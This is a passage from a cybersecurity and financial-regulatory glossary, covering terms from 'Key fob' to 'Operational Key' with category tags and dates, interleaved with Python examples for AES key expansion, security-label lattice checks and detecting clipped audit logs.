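    return [b"".join(words[4 * r:4 * r + 4]) for r in range(nr + 1)]


if __name__ == "__main__":
    fips_key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 A.1
    for rnd, rk in enumerate(expand_key(fips_key)):
        print(f"round {rnd:2d}: {rk.hex()}")
```

The schedule is invertible: anyone holding one full round key of AES-128 can run the recurrence backwards to the cipher key, which is why round keys must be protected as carefully as the key itself (for example, wiped from memory together with it).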
Key fobnounA small portable device equipped with chip technology allowing the holder the ability to access network systems, such as those used for payments, and to store personal data.PhysicalRegulatedPIIMay 9, 2026
Key Generation MaterialnounRandom numbers, pseudo-random numbers, and cryptographic parameters used in generating cryptographic keys.DataRegulatedCUIMay 9, 2026
Key ListnounPrinted series of key settings for a specific cryptonet. Key lists may be produced in list, pad, or printed tape format.ArtifactRegulatedCUIMay 9, 2026
Key LoadernounA self-contained unit that is capable of storing at least one plaintext or encrypted cryptographic key or a component of a key that can be transferred, upon request, into a cryptographic module.PhysicalRegulatedCUIMay 9, 2026
Key ManagementnounThe activities involving the handling of cryptographic keys and other related security parameters (e.g., IVs and passwords) during the entire life cycle of the keys, including their generation, storage, establishment, entry and output, and zeroization.ProcessRegulatedCUIMay 9, 2026
Key Management InfrastructurenounAll parts – computer hardware, firmware, software, and other equipment and its documentation; facilities that house the equipment and related functions; and companion standards, policies, procedures, and doctrine that form the system that manages and supports the ordering and delivery of cryptographic material and related information products and services to users.SystemRegulatedCUIMay 9, 2026
key resourcenounA publicly or privately controlled asset necessary to sustain continuity of government and/or economic operations, or an asset that is of great historical significance.PhysicalRegulatedMay 9, 2026
Key TagnounIdentification information associated with certain types of electronic key.ArtifactRegulatedCUIMay 12, 2026
Key TapenounPunched or magnetic tape containing key. Printed key in tape form is referred to as a key list.PhysicalRegulatedCUIMay 9, 2026
Key TransportnounThe secure transport of cryptographic keys from one cryptographic module to another module.ProcessRegulatedMay 9, 2026
Key UpdatingnounIrreversible cryptographic process for modifying key.ProcessRegulatedCUIMay 12, 2026
Key-Auto-KeynounCryptographic logic using previous key to produce key.ControlRegulatedCUIMay 12, 2026
Keyed-hash based message authentication codenounA message authentication code that uses a cryptographic key in conjunction with a hash function.ControlRegulatedMay 12, 2026
Keystroke MonitoringnounThe process used to view or record both the keystrokes entered by a computer user and the computer’s response during an interactive session. Keystroke monitoring is usually considered a special case of audit trails.ProcessRegulatedCUIMay 12, 2026
KMI Operating AccountnounA KMI business relationship that is established 1) to manage the set of user devices that are under the control of a specific KMI customer organization, and 2) to control the distribution of KMI products to those devices.OrganizationRegulatedCUIMay 9, 2026
KMI Protected ChannelnounA KMI Communication Channel that provides 1) Information Integrity Service; 2) either Data Origin Authentication Service or Peer Entity Authentication Service, as is appropriate to the mode of communications; and 3) optionally, Information Confidentiality Service.NetworkRegulatedCUIMay 9, 2026
KMI-Aware DevicenounA user device that has a user identity for which the registration has significance across the entire KMI (i.e., the identity’s registration data is maintained in a database at the PRSN level of the system, rather than only at an MGC) and for which a product can be generated and wrapped by a PSN for distribution to the specific device.SystemRegulatedCUIMay 9, 2026
KOA AgentnounA user identity that is designated by a KOA manager to access PRSN product delivery enclaves for the purpose of retrieving wrapped products that have been ordered for user devices that are assigned to that KOA.IdentityRegulatedCUIMay 9, 2026
KOA ManagernounThe Management Role that is responsible for the operation of one or more KOAs (i.e., manages distribution of KMI products to the end cryptographic units, fill devices, and ADPs that are assigned to the manager’s KOA).RoleRegulatedCUIMay 9, 2026
KOA Registration ManagernounThe individual responsible for performing activities related to registering KOAs.RoleRegulatedMay 12, 2026
Labeled Security ProtectionsnounAccess control protection features of a system that use security labels to make access control decisions.ControlRegulatedMay 12, 2026
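The Information Flow Control and Labeled Security Protections entries describe the same mechanism from two sides: labels form a lattice, and a transfer is allowed only when the destination label dominates the source. The block below is an added example, not code from the glossary's sources; the level names and compartment markings are illustrative, and the rule names (simple security property, star property) are the standard Bell-LaPadula terms.

```python
# Added example: a label lattice with read, write and flow checks.
from dataclasses import dataclass

LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}


@dataclass(frozen=True)
class Label:
    level: str
    compartments: frozenset = frozenset()   # e.g. {"NOFORN"}; illustrative

    def dominates(self, other: "Label") -> bool:
        """self >= other in the lattice: level at least as high and a superset
        of compartments. Labels with disjoint compartments are incomparable."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and self.compartments >= other.compartments)


def can_read(subject: Label, obj: Label) -> bool:
    """Simple security property: no read up."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label) -> bool:
    """Star property: no write down (the object must dominate the writer)."""
    return obj.dominates(subject)


def check_flow(source: Label, destination: Label) -> bool:
    """Information may flow from source to destination only if destination
    dominates source; this is the rule a flow-control monitor enforces."""
    return destination.dominates(source)


def join(a: Label, b: Label) -> Label:
    """Least upper bound: the label that data derived from both must carry."""
    top = a if LEVELS[a.level] >= LEVELS[b.level] else b
    return Label(top.level, a.compartments | b.compartments)


if __name__ == "__main__":
    analyst = Label("SECRET", frozenset({"NOFORN"}))
    for name, target in [("CONFIDENTIAL file", Label("CONFIDENTIAL")),
                         ("TOP SECRET file", Label("TOP SECRET")),
                         ("public share", Label("UNCLASSIFIED"))]:
        print(f"{name:17s} read={can_read(analyst, target)!s:5s} "
              f"write={can_write(analyst, target)}")
```

A practical consequence of `join`: a report built from a CONFIDENTIAL/{A} source and a SECRET/{B} source must be labelled SECRET/{A, B}, so a subject cleared for SECRET/{A} alone can no longer read it even though it could read one of the inputs.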
Laboratory AttacknounUse of sophisticated signal recovery equipment in a laboratory environment to recover information from data storage media.ThreatRegulatedCUIMay 9, 2026
Large value funds transfer systemnounA wholesale payment system used primarily by financial institutions in which large values of funds are transferred between parties. Fedwire® and CHIPS are the two large-value transfer systems in the United States.SystemRegulatedMay 12, 2026
lawnounAn individual rule as part of a system of law.RequirementRegulatedMay 9, 2026
Legal amount recognition (LAR)nounThe handwritten dollar amount of the check.DataRegulatedCDIMay 9, 2026
Level of ConcernnounRating assigned to an information system indicating the extent to which protection measures, techniques, and procedures must be applied. High, Medium, and Basic are identified levels of concern. A separate Level-of-Concern is assigned to each information system for confidentiality, integrity, and availability.MetricRegulatedCUIMay 12, 2026
Level of ProtectionnounExtent to which protective measures, techniques, and procedures must be applied to information systems and networks based on risk, threat, vulnerability, system interconnectivity considerations, and information assurance needs. Levels of protection are: 1. Basic: information systems and networks requiring implementation of standard minimum security countermeasures. 2. Medium: information systems and networks requiring layering of additional safeguards above the standard minimum security countermeasures. 3. High: information systems and networks requiring the most stringent protection and rigorous security countermeasures.RequirementRegulatedCUIMay 9, 2026
Line ConductionnounUnintentional signals or noise induced or conducted on a telecommunications or information system signal, power, control, indicator, or other external interface line.VulnerabilityRegulatedCUIMay 12, 2026
Local AuthoritynounOrganization responsible for generating and signing user certificates in a PKI-enabled environment.OrganizationRegulatedMay 12, 2026
Local Management Device/Key ProcessornounEKMS platform providing automated management of COMSEC material and generating key for designated users.SystemRegulatedCUIMay 9, 2026
Local Registration AuthoritynounA Registration Authority with responsibility for a local community in a PKI-enabled environment.OrganizationRegulatedCUIMay 9, 2026
locally mounted hardwarenounHardware installed inside the perimeter of a defined location. This includes but is not limited to motion sensors, electronic lock control mechanisms, and badge readers.PhysicalRegulatedMay 12, 2026
LockboxnounDeposit mechanism used by commercial firms and businesses to facilitate their deposit transaction volume. Typically, commercial firms and businesses direct customers to send payments directly to a financial institution address or post office box controlled by the institution. Financial institution personnel record payments received and prepare deposit slips, and subsequent processing proceeds as with other deposit taking activities.PhysicalRegulatedPCIMay 9, 2026
Log ClippingnounLog clipping is the selective removal of log entries from a system log to hide a compromise.ThreatRegulatedCUIMay 9, 2026
log managementnounThe process for generating, transmitting, storing, analyzing, and disposing of log data.ProcessRegulatedMay 9, 2026
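The Log Clipping and log management entries describe the attack and the discipline that counters it; the detection side can be shown on a few lines. The block below is an added example, not code from the glossary's sources: it scans auditd-style records, whose `msg=audit(<epoch>.<ms>:<serial>)` field carries an increasing serial number, and reports serial gaps and timestamps that move backwards. The four log lines are constructed for the example, with two records deleted and the survivors reordered, as a clipping attacker might leave them.

```python
# Added example: spotting clipped sections in an audit log.
import re

AUDIT_RE = re.compile(r"msg=audit\((\d+)\.(\d{3}):(\d+)\)")

# Constructed sample: serials 3103 and 3104 were removed, and the two
# remaining records after the cut are out of time order.
SAMPLE_LOG = """\
type=USER_LOGIN msg=audit(1715600000.101:3101): pid=2210 uid=0 auid=1000 ses=7 res=success
type=SYSCALL msg=audit(1715600003.240:3102): arch=c000003e syscall=59 success=yes exe="/usr/bin/sudo"
type=USER_END msg=audit(1715600090.512:3105): pid=2210 uid=0 auid=1000 ses=7 res=success
type=SYSCALL msg=audit(1715600088.004:3106): arch=c000003e syscall=257 success=yes exe="/usr/bin/cat"
"""


def parse_record(line: str):
    """Return (timestamp_ms, serial) for an audit record, None for other lines."""
    m = AUDIT_RE.search(line)
    if not m:
        return None
    sec, ms, serial = m.groups()
    return int(sec) * 1000 + int(ms), int(serial)


def find_clipping(text: str) -> dict:
    """Report serial-number gaps and time regressions between consecutive records."""
    gaps, regressions, count = [], [], 0
    prev = None
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        count += 1
        ts, serial = rec
        if prev is not None:
            prev_ts, prev_serial = prev
            if serial != prev_serial + 1:
                gaps.append((prev_serial, serial))     # missing: prev+1 .. serial-1
            if ts < prev_ts:
                regressions.append((prev_serial, serial))
        prev = (ts, serial)
    missing = sum(max(hi - lo - 1, 0) for lo, hi in gaps)
    return {"records": count, "gaps": gaps, "missing": missing,
            "regressions": regressions}


if __name__ == "__main__":
    for key, value in find_clipping(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

A gap is a lead, not proof: serials restart when the audit daemon restarts and can skip when records are dropped under load, so the finding should be correlated with daemon restart events. The stronger control belongs to log management rather than detection: forward records to a collector the local administrator cannot write to, so that clipping the host copy leaves the forwarded copy intact for comparison.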
Logic BombnounA piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.ThreatRegulatedMay 12, 2026
logical securitynounLogical Security consists of software safeguards for an organization's systems, including user identification and password access, authenticating, access rights and authority levels. These measures are to ensure that only authorized users are able to perform actions or access information in a network or a workstation.ControlRegulatedMay 9, 2026
login attemptnounAny failed or aborted activity of logging in.EventRegulatedMay 9, 2026
Long positionnounIn respect of a currency balance that is greater than zero, the amount by which such currency balance is greater than zero. A position that appreciates in value if market prices increase. When one buys a currency, their position is long.MetricRegulatedMay 12, 2026
Long TitlenounDescriptive title of a COMSEC item.ArtifactRegulatedCUIMay 9, 2026
Low ImpactnounThe loss of confidentiality, integrity, or availability that could be expected to have a limited adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is noticeably reduced; 2) results in minor damage to organizational assets; 3) results in minor financial loss; or 4) results in minor harm to individuals).RequirementRegulatedMay 9, 2026
low impact Bulk Electric System Cyber SystemnounA Bulk Electric System Cyber System in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of low, and none are assigned a potential impact value of medium or high.SystemRegulatedCUIMay 9, 2026
Low Impact Bulk Electric System Cyber System Electronic Access PointnounA Cyber Asset interface that controls Low Impact External Routable Connectivity. The Cyber Asset containing the LEAP may reside at a location external to the asset or assets containing low impact Bulk Electric System (BES) Cyber Systems.SystemRegulatedCUIMay 9, 2026
Low Impact External Routable ConnectivitynounDirect user-initiated interactive access or a direct device-to-device connection to a low impact BES Cyber System(s) from a Cyber Asset outside the asset containing those low impact BES Cyber System(s) via a bi-directional routable protocol connection. Point-to-point communications between intelligent electronic devices that use routable communication protocols for time-sensitive protection or control functions between Transmission station or substation assets containing low impact BES Cyber Systems are excluded from this definition (examples of this communication include, but are not limited to, IEC 61850 GOOSE or vendor proprietary protocols).NetworkRegulatedCDIMay 12, 2026
Low Probability of DetectionnounResult of measures used to hide or disguise intentional electromagnetic transmissions.ControlRegulatedCUIMay 12, 2026
Low Probability of InterceptnounResult of measures to prevent the intercept of intentional electromagnetic transmissions. The objective is to minimize an adversary’s capability of receiving, processing, or replaying an electronic signal.ControlRegulatedCUIMay 12, 2026
Low-Impact SystemnounAn information system in which all three security objectives (i.e., confidentiality, integrity, and availability) are assigned a FIPS 199 potential impact value of low.SystemRegulatedMay 12, 2026
Magnetic ink character recognition (MICR)nounMagnetic codes found on the bottom of checks, deposit slips, and general ledger debit and credit tickets that allow a machine to scan (capture) the information. MICR encoding on a check includes the account number, the routing number, the serial number of the check, and the amount of the check. The amount of the check is encoded when the proof department processes the check.DataRegulatedPIIMay 9, 2026
Magnetic RemanencenounMagnetic representation of residual information remaining on a magnetic medium after the medium has been cleared. See Clearing.VulnerabilityRegulatedCUIMay 9, 2026
Maintenance HooknounSpecial instructions (trapdoors) in software allowing easy maintenance and additional feature development. Since maintenance hooks frequently allow entry into the code without the usual checks, they are a serious security risk if they are not removed prior to live implementation.VulnerabilityRegulatedCUIMay 12, 2026
Major ApplicationnounAn application that requires special attention to security due to the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of the information in the application. Note: All federal applications require some level of protection. Certain applications, because of the information in them, however, require special management oversight and should be treated as major. Adequate security for other applications should be provided by security of the systems in which they operate.SystemRegulatedCUIMay 9, 2026
Major Information SystemnounAn information system that requires special management attention because of its importance to an agency mission; its high development, operating, or maintenance costs; or its significant role in the administration of agency programs, finances, property, or other resources.SystemRegulatedCUIMay 9, 2026
malicious actnounAn intentional, wrongful act performed against another without legal justification or excuse.ThreatRegulatedMay 12, 2026
malicious activitynounActivity with a harmful intent, such as fraud, theft, blackmail, vandalism, looting, sabotage, etc.ThreatRegulatedMay 9, 2026
malicious codenounSoftware or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.ThreatRegulatedMay 12, 2026
Malicious Code PreventionnounThe purpose of this policy is to prevent malicious code attacks from happening and, if they should happen, to quarantine the infected systems and eradicate the malicious code before it spreads further.ControlRegulatedMay 9, 2026
malicious logicnounHardware, firmware, or software that is intentionally included or inserted in a system for a harmful purpose.ThreatRegulatedMay 12, 2026
management authorizationnounOfficial permission or approval given by the senior executives of an organization.RequirementRegulatedMay 9, 2026
Management ClientnounA configuration of a client node that enables a KMI external operational manager to manage KMI products and services by either 1) accessing a PRSN, or 2) exercising locally provided capabilities. An MGC consists of a client platform and an advanced key processor (AKP).SystemRegulatedCUIMay 9, 2026
management functionnounA Security Management family component.ProcessRegulatedMay 12, 2026
Mandatory ModificationnounChange to a COMSEC end-item that NSA requires to be completed and reported by a specified date. See Optional Modification.ControlRegulatedCUIMay 9, 2026
Manipulative Communications DeceptionnounAlteration or simulation of friendly telecommunications for the purpose of deception. See Communications Deception and Imitative Communications Deception.ThreatRegulatedCUIMay 9, 2026
Manual CryptosystemnounCryptosystem in which the cryptographic processes are performed without the use of crypto-equipment or auto-manual devices.SystemRegulatedCUIMay 9, 2026
Manual Key TransportnounA non-automated means of transporting cryptographic keys by physically moving a device, document, or person containing or possessing the key or key component.ProcessRegulatedCUIMay 9, 2026
Manual Remote RekeyingnounProcedure by which a distant crypto-equipment is rekeyed electronically, with specific actions required by the receiving terminal operator. Synonymous with cooperative remote rekeying. See also Automatic Remote Keying.ProcessRegulatedCUIMay 9, 2026
Master Cryptographic Ignition KeynounKey device with electronic logic and circuits providing the capability for adding more operational CIKs to a keyset.PhysicalRegulatedCUIMay 9, 2026
Match/matchingnounThe process of comparing biometric information against a previously stored template(s) and scoring the level of similarity.ProcessRegulatedPIIMay 9, 2026
Matched instructionsnounTwo Instructions in which the information set forth in a specific CLS Bank Rule is matched in accordance with the parameters and procedures set forth in the CLS Bank Rules.ArtifactRegulatedMay 12, 2026
MatchingnounWith respect to compared and non-compared transactions, the process of comparing the trade or settlement details provided by counterparties to ensure they agree with respect to the terms of the transaction. Also called comparison checking.ProcessRegulatedMay 12, 2026
material changenounA change in the affairs of a company that is expected to have a significant effect on the market value of its securities - such as a change in the nature of the business, a change in the Board of Directors or the principal officers, a change in the share ownership of the company that could affect control, or the acquisition or disposition of any securities in another company. A material change must be reported to the applicable self-regulatory organization.EventRegulatedMay 9, 2026
MedianounPhysical devices or writing surfaces including but not limited to magnetic tapes, optical disks, magnetic disks, Large Scale Integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within an information system.PhysicalRegulatedMay 12, 2026
Media SanitizationnounA general term referring to the actions taken to render data written on media unrecoverable by both ordinary and extraordinary means.ProcessRegulatedMay 9, 2026
medium impact Bulk Electric System Cyber SystemnounA Bulk Electric System Cyber System in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of medium, and none are assigned a potential impact value of high.SystemRegulatedCUIMay 9, 2026
Memory ScavengingnounThe collection of residual information from data storage.ProcessRegulatedCUIMay 9, 2026
Merchant acquirernounBankcard association members that initiate and maintain contractual agreements with merchants for the purpose of accepting and processing bankcard transactions.OrganizationRegulatedPCIMay 9, 2026
Merchant processingnounActivity for the acceptance and settlement of bankcard products and transactions from merchants through the payment system.ProcessRegulatedPCIMay 9, 2026
Message IndicatornounSequence of bits transmitted over a communications system for synchronizing cryptographic equipment.DataRegulatedCUIMay 9, 2026
methodnounA means or particular procedure for accomplishing or approaching something.ProcessRegulatedMay 12, 2026
migrationnounThe purpose of this task is to move records from one system or storage medium to another while maintaining authenticity, integrity, reliability, and usability.ProcessRegulatedMay 12, 2026
MinimizationnounRequirementRegulatedMay 13, 2026
Minor ApplicationnounAn application, other than a major application, that requires attention to security due to the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of the information in the application. Minor applications are typically included as part of a general support system.SystemRegulatedMay 12, 2026
Misnamed FilesnounA technique used to disguise a file’s content by changing the file’s name to something innocuous or altering its extension to a different type of file, forcing the examiner to identify the files by file signature versus file extension.ThreatRegulatedMay 9, 2026
Mission Assurance CategorynounA Department of Defense Information Assurance Certification and Accreditation Process (DIACAP) term primarily used to determine the requirements for availability and integrity.RequirementRegulatedCDIMay 9, 2026
Mission CriticalnounAny telecommunications or information system that is defined as a national security system (Federal Information Security Management Act of 2002 - FISMA) or processes any information the loss, misuse, disclosure, or unauthorized access to or modification of, would have a debilitating impact on the mission of an agency.RequirementRegulatedCUIMay 9, 2026
mobile codenounSoftware programs or parts of programs obtained from remote information systems, transmitted across a network, and executed on a local information system without explicit installation or execution by the recipient. Note: Some examples of software technologies that provide the mechanisms for the production and use of mobile code include Java, JavaScript, ActiveX, VBScript, etc.ThreatRegulatedMay 12, 2026
mobile devicenounPortable cartridge/disk-based, removable storage media (e.g., floppy disks, compact disks, USB flash drives, external hard drives, and other flash memory cards/drives that contain nonvolatile memory). Portable computing and communications device with information storage capability (e.g., notebook/laptop computers, personal digital assistants, cellular telephones, digital cameras, and audio recording devices).PhysicalRegulatedMay 12, 2026
Mobile financial servicesnounThe products and services that a financial institution provides to its customers through mobile devices.CapabilityRegulatedPIIMay 9, 2026
Mobile sitenounThe use of a mobile/temporary facility to serve as a business resumption location. The facility can usually be delivered to any site and can house information technology and staff.PhysicalRegulatedMay 12, 2026
Mode of OperationnounDescription of the conditions under which an information system operates based on the sensitivity of information processed and the clearance levels, formal access approvals, and need-to-know of its users. Four modes of operation are authorized for processing or transmitting information: dedicated mode, system high mode, compartmented/partitioned mode, and multilevel mode.RequirementRegulatedCUIMay 9, 2026
Moderate ImpactnounThe loss of confidentiality, integrity, or availability that could be expected to have a serious adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in significant damage to organizational assets; 3) results in significant financial loss; or 4) results in significant harm to individuals that does not involve loss of life or serious life threatening injuries).MetricRegulatedCUIMay 12, 2026
Moderate-Impact SystemnounAn information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of moderate and no security objective is assigned a FIPS 199 potential impact value of high.SystemRegulatedMay 9, 2026
Multi-ReleasablenounA characteristic of an information domain where access control mechanisms enforce policy-based release of information to authorized users within the information domain.RequirementRegulatedCUIMay 9, 2026
Multilateral netting settlement systemnounMultilateral netting is an arrangement among three or more parties to net their obligations. In these settlement systems transfers are irrevocable but are only final after the completion of end-of-day-settlement.SystemRegulatedMay 12, 2026
Multilevel DevicenounEquipment trusted to properly maintain and separate data of different security domains.SystemRegulatedCUIMay 9, 2026
Multilevel ModenounMode of operation wherein all the following statements are satisfied concerning the users who have direct or indirect access to the system, its peripherals, remote terminals, or remote hosts: 1) some users do not have a valid security clearance for all the information processed in the information system; 2) all users have the proper security clearance and appropriate formal access approval for that information to which they have access; and 3) all users have a valid need-to-know only for information to which they have access.ProcessRegulatedCUIMay 9, 2026
Multilevel SecuritynounConcept of processing information with different classifications and categories that simultaneously permits access by users with different security clearances and denies access to users who lack authorization.CapabilityRegulatedCUIMay 12, 2026
Multiple Security LevelsnounCapability of an information system that is trusted to contain, and maintain separation between, resources (particularly stored data) of different security domains.CapabilityRegulatedCUIMay 12, 2026
multiple sourcesnounInformation classified based on two or more source documents, classification guides or combination of both.DataRegulatedCUIMay 9, 2026
National Information Assurance PartnershipnounA U.S. government initiative established to promote the use of evaluated information systems products and champion the development and use of national and international standards for information technology security. NIAP was originally established as a collaboration between the National Institute of Standards and Technology (NIST) and the National Security Agency (NSA) in fulfilling their respective responsibilities under P.L. 100-235 (Computer Security Act of 1987). NIST officially withdrew from the partnership in 2007 but NSA continues to manage and operate the program. The key operational component of NIAP is the Common Criteria Evaluation and Validation Scheme (CCEVS) which is the only U.S. government-sponsored and endorsed program for conducting internationally recognized security evaluations of commercial off-the-shelf (COTS) Information Assurance (IA) and IA-enabled information technology products. NIAP employs the CCEVS to provide government oversight or “validation” to U.S. CC evaluations to ensure correct conformance to the International Common Criteria for IT Security Evaluation (ISO/IEC 15408).OrganizationRegulatedMay 12, 2026
National Information InfrastructurenounNationwide interconnection of communications networks, computers, databases, and consumer electronics that make vast amounts of information available to users. It includes both public and private networks, the Internet, the public switched network, and cable, wireless, and satellite communications.NetworkRegulatedMay 9, 2026
National Security Emergency Preparedness Telecommunications ServicesnounTelecommunications services that are used to maintain a state of readiness or to respond to and manage any event or crisis (local, national, or international) that causes or could cause injury or harm to the population, damage to or loss of property, or degrade or threaten the national security or emergency preparedness posture of the United States.CapabilityRegulatedCUIMay 9, 2026
National Security InformationnounInformation that has been determined pursuant to Executive Order 12958 as amended by Executive Order 13292, or any predecessor order, or by the Atomic Energy Act of 1954, as amended, to require protection against unauthorized disclosure and is marked to indicate its classified status.DataRegulatedCUIMay 9, 2026
National Security SystemnounAny information system (including any telecommunications system) used or operated by an agency or by a contractor of any agency, or other organization on behalf of an agency, the function, operation, or use of which: I. involves intelligence activities; II. involves cryptologic activities related to national security; III. involves command and control of military forces; IV. involves equipment that is an integral part of a weapon or weapon system; or V. subject to subparagraph (B), is critical to the direct fulfillment of military or intelligence missions; or is protected at all times by procedures established for information that have been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy. Subparagraph (B): does not include a system that is to be used for routine administrative and business applications (including payroll, finance, logistics, and personnel management applications). (Title 44 U.S. Code Section 3542, Federal Information Security Management Act of 2002.)SystemRegulatedCUIMay 9, 2026
National Settlement Service (NSS)nounAlso referred to as Deferred Net Settlement. The Federal Reserve Banks' multilateral settlement service. NSS is offered to depository institutions that settle for participants in clearinghouses, financial exchanges, and other clearing and settlement groups. Settlement agents acting on behalf of those depository institutions electronically submit settlement files to the Federal Reserve Banks. Files are processed on receipt, and entries are automatically posted to the depository institutions' Reserve Bank accounts. Entries are final when posted.OrganizationRegulatedMay 12, 2026
National Vulnerability DatabasenounThe U.S. government repository of standards-based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance (e.g., FISMA).VulnerabilityRegulatedMay 12, 2026
Natural Language ProcessingnounRegulatedMay 13, 2026
need to knownounAn administrative action officially declaring a particular individual requires access to specified sensitive or classified information in order to perform their assigned duties.RequirementRegulatedCUIMay 12, 2026
Need To Know DeterminationnounDecision made by an authorized holder of official information that a prospective recipient requires access to specific official information to carry out official duties.ProcessRegulatedCUIMay 9, 2026
negative effectnounA measure, expressed as a function of the likelihood that an event may occur, how fast the event may impact objectives and the estimated negative impact that an event may have on objectives or the impact that an event had on objectives.MetricRegulatedMay 12, 2026
Net debit capnounThe maximum dollar amount of uncollateralized daylight overdrafts that an institution is authorized to incur in its Federal Reserve account. The net debit cap is generally equal to an institution's capital times the cap multiple for its cap category.RequirementRegulatedMay 9, 2026
network portnounA network port is a process-specific or application-specific software construct serving as a communication endpoint, which is used by the Transport Layer protocols of the Internet Protocol suite, such as User Datagram Protocol (UDP) and Transmission Control Protocol (TCP).NetworkRegulatedMay 9, 2026
no longer needed for legal, regulatory, or business reasonnounSomething that is not needed anymore for business, regulatory, or legal reasons.RequirementRegulatedMay 9, 2026
No-Lone ZonenounArea, room, or space that, when staffed, must be occupied by two or more appropriately cleared individuals who remain within sight of each other. See Two-Person Integrity.ControlRegulatedCUIMay 9, 2026
non-compliancenounThe failure to achieve performance criteria of a regulation or authority.FindingRegulatedMay 9, 2026
non-compliance informationnounInformation regarding a failure to act in accordance with applicable standards and regulations.FindingRegulatedCUIMay 9, 2026
Non-Local MaintenancenounMaintenance activities conducted by individuals communicating through a network; either an external network (e.g., the Internet) or an internal network.ProcessRegulatedMay 12, 2026
non-programmable communication componentnounPhysicalRegulatedMay 8, 2026
Non-public personal informationnounDataRegulatedPIIMay 8, 2026
non-shared user accountnounIdentityRegulatedMay 8, 2026
noticenounAny documented (in print or electronic format) notice or notification to another person by taking such steps as may be reasonably required to inform the other person in ordinary course, whether or not the other person actually comes to know of it.ArtifactRegulatedMay 12, 2026
notificationnounThe act of giving notice of or reporting something formally or officially.EventRegulatedMay 9, 2026
notification requirementnounThe obligation to officially inform a party of something important.RequirementRegulatedMay 9, 2026
NullnounDummy letter, letter symbol, or code group inserted into an encrypted message to delay or prevent its decryption or to complete encrypted groups for transmission or transmission security purposes.ControlRegulatedCUIMay 12, 2026
Null SessionnounKnown as Anonymous Logon, it is a way of letting an anonymous user retrieve information such as user names and shares over the network or connect without authentication. It is used by applications such as explorer.exe to enumerate shares on remote servers.VulnerabilityRegulatedMay 12, 2026
Object IdentifiernounA specialized formatted number that is registered with an internationally recognized standards organization. The unique alphanumeric/numeric identifier registered under the ISO registration standard to reference a specific object or object class. In the federal government PKI, they are used to uniquely identify each of the four policies and cryptographic algorithms supported.ArtifactRegulatedCUIMay 12, 2026
Object ReusenounReassignment and reuse of a storage medium containing one or more objects after ensuring no residual data remains on the storage medium.ControlRegulatedMay 12, 2026
Off-CardnounRefers to data that is not stored within the PIV card or computation that is not done by the Integrated Circuit Chip (ICC) of the PIV card.DataRegulatedCUIMay 9, 2026
Office of Foreign Asset Control (OFAC)nounThe Office of Foreign Assets Control, United States Department of the Treasury, administers and enforces economic sanctions programs primarily against countries and groups of individuals such as terrorists and narcotics traffickers. The sanctions can be either comprehensive or selective, using the blocking of assets and trade restrictions to accomplish foreign policy and national security goals.OrganizationRegulatedMay 9, 2026
Office of Foreign Assets Control (OFAC)nounThe Office of Foreign Assets Control, Department of the Treasury, administers and enforces economic sanctions programs primarily against countries and groups of individuals such as terrorists and narcotics traffickers. The sanctions can be either comprehensive or selective, using the blocking of assets and trade restrictions to accomplish foreign policy and national security goals.OrganizationRegulatedMay 12, 2026
Official InformationnounAll information in the custody and control of a U.S. government department or agency that was acquired by U.S. government employees as a part of their official duties or because of their official status and has not been cleared for public release.DataRegulatedCUIMay 9, 2026
offsite backupnounA backup process or facility that stores backup data or applications external to the organization or core IT environment.ProcessRegulatedMay 12, 2026
Offsite rotationnounUsed for backup and/or disaster recovery; moving a copy of the most current database, information, file, or tape to an offsite storage facility to be used only in an emergency.ProcessRegulatedMay 9, 2026
On-CardnounRefers to data that is stored within the PIV card or computation that is done by the ICC of the PIV card.DataRegulatedCUIMay 9, 2026
On-us checksnounChecks that are deposited into the same institution on which they are drawn.DataRegulatedPIIMay 9, 2026
One-time TapenounPunched paper tape used to provide key streams on a one-time basis in certain machine cryptosystems.PhysicalRegulatedCUIMay 9, 2026
Online AttacknounAn attack against an authentication protocol where the Attacker either assumes the role of a Claimant with a genuine Verifier or actively alters the authentication channel. The goal of the attack may be to gain authenticated access or learn authentication secrets.ThreatRegulatedMay 12, 2026
Online CryptosystemnounCryptographic system in which encryption and decryption are performed in association with the transmitting and receiving functions.CapabilityRegulatedMay 12, 2026
online terminalnounA web-browser-based access to an acquirer, processor or third party service provider website to authorize payment card transactions, where the merchant manually enters payment card data via a securely connected web browser. Unlike physical terminals, virtual payment terminals do not read data directly from a payment card. Because payment card transactions are entered manually, virtual payment terminals are typically used instead of physical terminals in merchant environments with low transaction volumes.SystemRegulatedPCIMay 9, 2026
Open StoragenounAny storage of classified national security information outside of approved containers. This includes classified information that is resident on information systems media and outside of an approved storage container, regardless of whether or not that media is in use (i.e., unattended operations).FindingRegulatedCUIMay 9, 2026
operational controlnounThe day-to-day security procedures and mechanisms to protect operational systems. The operational controls consist of the physical, environmental and personnel security controls. These controls deal with the everyday operation of a company or organization to ensure all objectives are achieved.ControlRegulatedMay 9, 2026
Operational KeynounKey intended for use over-the-air for protection of operational information or for the production or secure electrical transmission of key streams.CredentialRegulatedCUIMay 9, 2026
